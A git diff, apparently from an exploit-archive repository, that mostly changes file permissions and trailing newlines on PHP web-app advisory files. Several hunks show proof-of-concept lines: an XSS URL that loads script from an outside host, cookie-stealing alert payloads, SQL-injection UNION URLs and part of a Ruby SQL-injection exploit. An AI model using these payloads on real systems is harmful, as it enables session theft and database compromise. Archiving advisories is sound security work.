b/platforms/php/webapps/28072.txt old mode 100755 new mode 100644 index 788d357c1..a3726eb6e --- a/platforms/php/webapps/28072.txt +++ b/platforms/php/webapps/28072.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file +http://www.example.com/messenger/profile.php?new_reg=1&site_id=<IMG%20"""><SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>"> \ No newline at end of file diff --git a/platforms/php/webapps/28073.txt b/platforms/php/webapps/28073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28074.txt b/platforms/php/webapps/28074.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28075.txt b/platforms/php/webapps/28075.txt old mode 100755 new mode 100644 index ad80a2ec9..1fcade749 --- a/platforms/php/webapps/28075.txt +++ b/platforms/php/webapps/28075.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t A successful exploit could also allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://example.com/messenger/mycontacts.php?membername=putausername \ No newline at end of file +http://example.com/messenger/mycontacts.php?membername=putausername \ No newline at end of file diff --git a/platforms/php/webapps/28076.txt b/platforms/php/webapps/28076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28078.txt b/platforms/php/webapps/28078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2808.txt b/platforms/php/webapps/2808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28088.txt b/platforms/php/webapps/28088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28089.txt b/platforms/php/webapps/28089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28090.txt b/platforms/php/webapps/28090.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28091.txt b/platforms/php/webapps/28091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28092.txt b/platforms/php/webapps/28092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28093.txt b/platforms/php/webapps/28093.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28094.txt b/platforms/php/webapps/28094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28095.txt b/platforms/php/webapps/28095.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28096.txt b/platforms/php/webapps/28096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28097.txt b/platforms/php/webapps/28097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28098.txt b/platforms/php/webapps/28098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2810.php b/platforms/php/webapps/2810.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28101.txt b/platforms/php/webapps/28101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28102.txt b/platforms/php/webapps/28102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28104.txt b/platforms/php/webapps/28104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28105.txt b/platforms/php/webapps/28105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28106.txt b/platforms/php/webapps/28106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28107.txt b/platforms/php/webapps/28107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28108.txt b/platforms/php/webapps/28108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28109.txt b/platforms/php/webapps/28109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2811.txt b/platforms/php/webapps/2811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28110.txt b/platforms/php/webapps/28110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28111.txt b/platforms/php/webapps/28111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28112.txt b/platforms/php/webapps/28112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28113.txt b/platforms/php/webapps/28113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28114.txt b/platforms/php/webapps/28114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28115.txt b/platforms/php/webapps/28115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28117.txt b/platforms/php/webapps/28117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28119.txt b/platforms/php/webapps/28119.txt old mode 100755 new mode 100644 index 90a597f5f..3e2be1415 --- a/platforms/php/webapps/28119.txt +++ b/platforms/php/webapps/28119.txt @@ -4,4 +4,4 @@ VCard PRO is prone to multiple SQL-injection vulnerabilities. These issues are d A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/gbrowse.php?cat_id=[SQL] \ No newline at end of file +http://www.example.com/gbrowse.php?cat_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/28120.txt b/platforms/php/webapps/28120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28121.txt b/platforms/php/webapps/28121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28122.txt b/platforms/php/webapps/28122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28125.txt b/platforms/php/webapps/28125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28126.rb b/platforms/php/webapps/28126.rb index 84659215b..14f5a3ece 100755 --- a/platforms/php/webapps/28126.rb +++ b/platforms/php/webapps/28126.rb @@ -107,4 +107,4 @@ dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+ " rescue print "\nExploit Failed" -end \ No newline at end of file +end \ No newline at end of file diff --git a/platforms/php/webapps/28128.txt b/platforms/php/webapps/28128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28129.txt b/platforms/php/webapps/28129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28131.txt b/platforms/php/webapps/28131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28132.txt b/platforms/php/webapps/28132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28133.txt b/platforms/php/webapps/28133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28134.txt b/platforms/php/webapps/28134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28137.txt b/platforms/php/webapps/28137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28138.txt b/platforms/php/webapps/28138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28139.txt b/platforms/php/webapps/28139.txt old mode 100755 new mode 100644 index 88c29a795..fc3e816fc --- a/platforms/php/webapps/28139.txt +++ b/platforms/php/webapps/28139.txt @@ -7,5 +7,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t GET http://www.example.com:80/gen_confirm_mem.php HTTP/1.0 Accept: */* Host: www.example.com -Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script> - \ No newline at end of file +Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script> \ No newline at end of file diff --git a/platforms/php/webapps/2814.txt b/platforms/php/webapps/2814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28140.txt b/platforms/php/webapps/28140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28141.txt b/platforms/php/webapps/28141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28142.txt b/platforms/php/webapps/28142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28146.txt b/platforms/php/webapps/28146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28147.txt b/platforms/php/webapps/28147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28148.txt b/platforms/php/webapps/28148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28149.txt b/platforms/php/webapps/28149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28150.txt b/platforms/php/webapps/28150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28151.txt b/platforms/php/webapps/28151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28152.txt b/platforms/php/webapps/28152.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28153.txt b/platforms/php/webapps/28153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28154.txt b/platforms/php/webapps/28154.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28155.txt b/platforms/php/webapps/28155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28156.txt b/platforms/php/webapps/28156.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28157.txt b/platforms/php/webapps/28157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28158.txt b/platforms/php/webapps/28158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28159.txt b/platforms/php/webapps/28159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28161.txt b/platforms/php/webapps/28161.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28162.txt b/platforms/php/webapps/28162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28163.txt b/platforms/php/webapps/28163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28167.txt b/platforms/php/webapps/28167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28168.txt b/platforms/php/webapps/28168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2817.txt b/platforms/php/webapps/2817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28171.txt b/platforms/php/webapps/28171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28174.txt b/platforms/php/webapps/28174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28176.txt b/platforms/php/webapps/28176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28177.txt b/platforms/php/webapps/28177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28178.txt b/platforms/php/webapps/28178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28179.txt b/platforms/php/webapps/28179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2818.txt b/platforms/php/webapps/2818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28180.txt b/platforms/php/webapps/28180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28185.txt b/platforms/php/webapps/28185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2819.txt b/platforms/php/webapps/2819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28190.txt b/platforms/php/webapps/28190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28191.txt b/platforms/php/webapps/28191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28192.txt b/platforms/php/webapps/28192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28195.txt b/platforms/php/webapps/28195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28199.txt b/platforms/php/webapps/28199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2820.txt b/platforms/php/webapps/2820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28200.txt b/platforms/php/webapps/28200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28201.txt b/platforms/php/webapps/28201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28204.txt b/platforms/php/webapps/28204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28205.txt b/platforms/php/webapps/28205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28206.txt b/platforms/php/webapps/28206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28211.txt b/platforms/php/webapps/28211.txt old mode 100755 new mode 100644 index 85f8405de..3e8b7e1de --- a/platforms/php/webapps/28211.txt +++ b/platforms/php/webapps/28211.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t These issues affect version 1.6; other versions may also be vulnerable. http://www.example.com/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS] -http://www.example.com/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/28212.txt b/platforms/php/webapps/28212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28214.txt b/platforms/php/webapps/28214.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28215.txt b/platforms/php/webapps/28215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28216.txt b/platforms/php/webapps/28216.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28217.txt b/platforms/php/webapps/28217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28219.txt b/platforms/php/webapps/28219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28223.txt b/platforms/php/webapps/28223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28229.txt b/platforms/php/webapps/28229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2823.txt b/platforms/php/webapps/2823.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28231.txt b/platforms/php/webapps/28231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28233.txt b/platforms/php/webapps/28233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28247.txt b/platforms/php/webapps/28247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28248.txt b/platforms/php/webapps/28248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28249.txt b/platforms/php/webapps/28249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28250.txt b/platforms/php/webapps/28250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28251.txt b/platforms/php/webapps/28251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28253.txt b/platforms/php/webapps/28253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28255.txt b/platforms/php/webapps/28255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2826.txt b/platforms/php/webapps/2826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28260.txt b/platforms/php/webapps/28260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28261.txt b/platforms/php/webapps/28261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28262.txt b/platforms/php/webapps/28262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28264.txt b/platforms/php/webapps/28264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28267.txt b/platforms/php/webapps/28267.txt old mode 100755 new mode 100644 index e3ace4b54..c66bcad86 --- a/platforms/php/webapps/28267.txt +++ b/platforms/php/webapps/28267.txt @@ -8,4 +8,4 @@ http://www.example.com/linkscaffe/links.php?cat=1&offset=[SQL] http://www.example.com/linkscaffe/links.php?cat=1&limit=[SQL] http://www.example.com/linkscaffe/links.php?action=new&newdays=[SQL] http://www.example.com/linkscaffe/links.php?action=deadlink&link_id=[SQL] -http://www.example.com/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/* \ No newline at end of file +http://www.example.com/linkscaffe/links.php?action=new&newdays=-1+UNION+SELECT+123456/* \ No newline at end of file diff --git a/platforms/php/webapps/28268.txt b/platforms/php/webapps/28268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28269.txt b/platforms/php/webapps/28269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2827.txt b/platforms/php/webapps/2827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28270.txt b/platforms/php/webapps/28270.txt old mode 100755 new mode 100644 index a9a52b2b0..1b2cd9ead --- a/platforms/php/webapps/28270.txt +++ b/platforms/php/webapps/28270.txt @@ -10,4 +10,4 @@ http://www.example.com/linkscaffe/menu.inc.php?menucolor='%3E[XSS] http://www.example.com/linkscaffe/menu.inc.php?textcolor='%3E[XSS] -http://www.example.com/linkscaffe/menu.inc.php?bodycolor='%3E[XSS] \ No newline at end of file +http://www.example.com/linkscaffe/menu.inc.php?bodycolor='%3E[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/28272.txt b/platforms/php/webapps/28272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28273.txt b/platforms/php/webapps/28273.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28274.txt b/platforms/php/webapps/28274.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28275.txt b/platforms/php/webapps/28275.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28276.txt b/platforms/php/webapps/28276.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28280.txt b/platforms/php/webapps/28280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28281.txt b/platforms/php/webapps/28281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28282.txt b/platforms/php/webapps/28282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28289.txt b/platforms/php/webapps/28289.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28291.txt b/platforms/php/webapps/28291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28292.txt b/platforms/php/webapps/28292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28294.txt b/platforms/php/webapps/28294.txt old mode 100755 new mode 100644 index 1375ade66..71f74b2b2 --- a/platforms/php/webapps/28294.txt +++ b/platforms/php/webapps/28294.txt @@ -4,4 +4,4 @@ PHPNuke INP is prone to a cross-site scripting vulnerability that affects the 'm The specific version affected is currently unknown. -http://www.example.com/[path]/modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script>< \ No newline at end of file +http://www.example.com/[path]/modules.php?name=Downloads&op=search&query=><script>alert('ARIA')</script>< \ No newline at end of file diff --git a/platforms/php/webapps/28295.txt b/platforms/php/webapps/28295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28296.txt b/platforms/php/webapps/28296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28297.txt b/platforms/php/webapps/28297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28302.txt b/platforms/php/webapps/28302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28303.txt b/platforms/php/webapps/28303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28304.txt b/platforms/php/webapps/28304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28305.txt b/platforms/php/webapps/28305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28306.txt b/platforms/php/webapps/28306.txt old mode 100755 new mode 100644 index d934d763e..1a3b3508e --- a/platforms/php/webapps/28306.txt +++ b/platforms/php/webapps/28306.txt @@ -8,4 +8,4 @@ An attacker may also leverage the remote file-include issue to include an arbitr Version 2.1 of the application is affected by these vulnerabilities; other versions may also be affected. -http://www.example.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/ \ No newline at end of file +http://www.example.com/signup.php?signup=1&user_pw=2&passwordconfirm=2&user_name=3&name=3&email=3&site_url=3&site_name='[SQL]/ \ No newline at end of file diff --git a/platforms/php/webapps/28307.txt b/platforms/php/webapps/28307.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28308.txt b/platforms/php/webapps/28308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28309.txt b/platforms/php/webapps/28309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2831.txt b/platforms/php/webapps/2831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28310.txt b/platforms/php/webapps/28310.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28311.txt b/platforms/php/webapps/28311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28315.txt b/platforms/php/webapps/28315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28316.txt b/platforms/php/webapps/28316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28317.txt b/platforms/php/webapps/28317.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28318.txt b/platforms/php/webapps/28318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28319.txt b/platforms/php/webapps/28319.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2832.txt b/platforms/php/webapps/2832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28320.txt b/platforms/php/webapps/28320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28322.txt b/platforms/php/webapps/28322.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28323.txt b/platforms/php/webapps/28323.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28324.txt b/platforms/php/webapps/28324.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28326.txt b/platforms/php/webapps/28326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28327.txt b/platforms/php/webapps/28327.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28329.txt b/platforms/php/webapps/28329.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2833.txt b/platforms/php/webapps/2833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28330.txt b/platforms/php/webapps/28330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2834.txt b/platforms/php/webapps/2834.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28342.txt b/platforms/php/webapps/28342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28347.txt b/platforms/php/webapps/28347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28349.txt b/platforms/php/webapps/28349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2835.txt b/platforms/php/webapps/2835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28350.txt b/platforms/php/webapps/28350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28351.txt b/platforms/php/webapps/28351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28352.txt b/platforms/php/webapps/28352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28353.txt b/platforms/php/webapps/28353.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28354.txt b/platforms/php/webapps/28354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28355.txt b/platforms/php/webapps/28355.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28356.txt b/platforms/php/webapps/28356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28359.txt b/platforms/php/webapps/28359.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2836.txt b/platforms/php/webapps/2836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28362.txt b/platforms/php/webapps/28362.txt old mode 100755 new mode 100644 index 8c1686dfc..7b5bb1f3d --- a/platforms/php/webapps/28362.txt +++ b/platforms/php/webapps/28362.txt @@ -7,4 +7,4 @@ Version 1.0 of Simple one-file guestbook is vulnerable. Other versions may be af #Simple One-File Guestbook Adminstrator Credential Bypass #Proof of Concept URL -http://www.example.com/[path]/guestbook.php?id=4 \ No newline at end of file +http://www.example.com/[path]/guestbook.php?id=4 \ No newline at end of file diff --git a/platforms/php/webapps/28363.txt b/platforms/php/webapps/28363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28364.txt b/platforms/php/webapps/28364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28366.txt b/platforms/php/webapps/28366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28370.txt b/platforms/php/webapps/28370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28371.txt b/platforms/php/webapps/28371.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28372.txt b/platforms/php/webapps/28372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28377.txt b/platforms/php/webapps/28377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28378.txt b/platforms/php/webapps/28378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28379.txt b/platforms/php/webapps/28379.txt old mode 100755 new mode 100644 index 1fbfda738..e24140274 --- a/platforms/php/webapps/28379.txt +++ b/platforms/php/webapps/28379.txt @@ -11,4 +11,4 @@ Version 1.3e is reported vulnerable; other versions may also be affected. + PoC: + + http://www.example.com/install/install3.php?database=none&cabsolute_path=[script] -+ \ No newline at end of file ++ \ No newline at end of file diff --git a/platforms/php/webapps/2838.txt b/platforms/php/webapps/2838.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28382.txt b/platforms/php/webapps/28382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28388.txt b/platforms/php/webapps/28388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2839.txt b/platforms/php/webapps/2839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28390.txt b/platforms/php/webapps/28390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28392.txt b/platforms/php/webapps/28392.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28396.txt b/platforms/php/webapps/28396.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28399.txt b/platforms/php/webapps/28399.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2840.txt b/platforms/php/webapps/2840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28402.txt b/platforms/php/webapps/28402.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28403.txt b/platforms/php/webapps/28403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28404.txt b/platforms/php/webapps/28404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28406.txt b/platforms/php/webapps/28406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28409.txt b/platforms/php/webapps/28409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2841.php b/platforms/php/webapps/2841.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28410.txt b/platforms/php/webapps/28410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28411.txt b/platforms/php/webapps/28411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28412.txt b/platforms/php/webapps/28412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28413.txt b/platforms/php/webapps/28413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28414.txt b/platforms/php/webapps/28414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28415.txt b/platforms/php/webapps/28415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28416.txt b/platforms/php/webapps/28416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28417.txt b/platforms/php/webapps/28417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28418.txt b/platforms/php/webapps/28418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28419.txt b/platforms/php/webapps/28419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2842.php b/platforms/php/webapps/2842.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28422.txt b/platforms/php/webapps/28422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28423.txt b/platforms/php/webapps/28423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28426.txt b/platforms/php/webapps/28426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28428.txt b/platforms/php/webapps/28428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28429.js b/platforms/php/webapps/28429.js old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28430.txt b/platforms/php/webapps/28430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28431.txt b/platforms/php/webapps/28431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28432.txt b/platforms/php/webapps/28432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28433.txt b/platforms/php/webapps/28433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28434.txt b/platforms/php/webapps/28434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28435.txt b/platforms/php/webapps/28435.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28436.txt b/platforms/php/webapps/28436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28437.txt b/platforms/php/webapps/28437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28439.txt b/platforms/php/webapps/28439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28440.txt b/platforms/php/webapps/28440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28441.txt b/platforms/php/webapps/28441.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28442.txt b/platforms/php/webapps/28442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28444.txt b/platforms/php/webapps/28444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28446.txt b/platforms/php/webapps/28446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/28447.php b/platforms/php/webapps/28447.php old mode 100755 new mode 100644 index 